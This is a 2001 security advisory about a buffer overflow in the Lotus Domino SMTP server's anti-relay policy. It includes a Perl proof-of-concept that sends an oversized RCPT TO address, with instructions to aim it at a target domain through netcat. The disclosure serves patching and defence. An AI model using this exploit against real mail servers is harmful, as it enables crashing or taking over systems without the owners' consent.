Reported January 23, 2001, by S.A.F.E.R.

VERSIONS AFFECTED
  • Lotus Domino Notes Server 5 and 5.05

DESCRIPTION

Lotus Domino SMTP Server contains a policy feature that you can use to prevent email relaying. However, a malicious attacker can use a vulnerability in this policy feature to overflow the buffer and possibly launch arbitrary commands.

DEMONSTRATION

S.A.F.E.R. supplied the following proof-of-concept code:

-- cut --

#!/usr/bin/perl

$req="a" . "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com";

print "ehlo foo\nmail from: blah\@example.com\nrcpt

to:$req\ndata\nfoo\n.\nquit\n";

-- cut --

Simply replace “allowed.domain.com” with the domain name running Lotus Notes SMTP Server, and pipe the output through netcat.

VENDOR RESPONSE

Lotus was informed of this vulnerability on November 2, 2000, and has fixed this issue in release 5.06.

CREDIT

Discovered by S.A.F.E.R.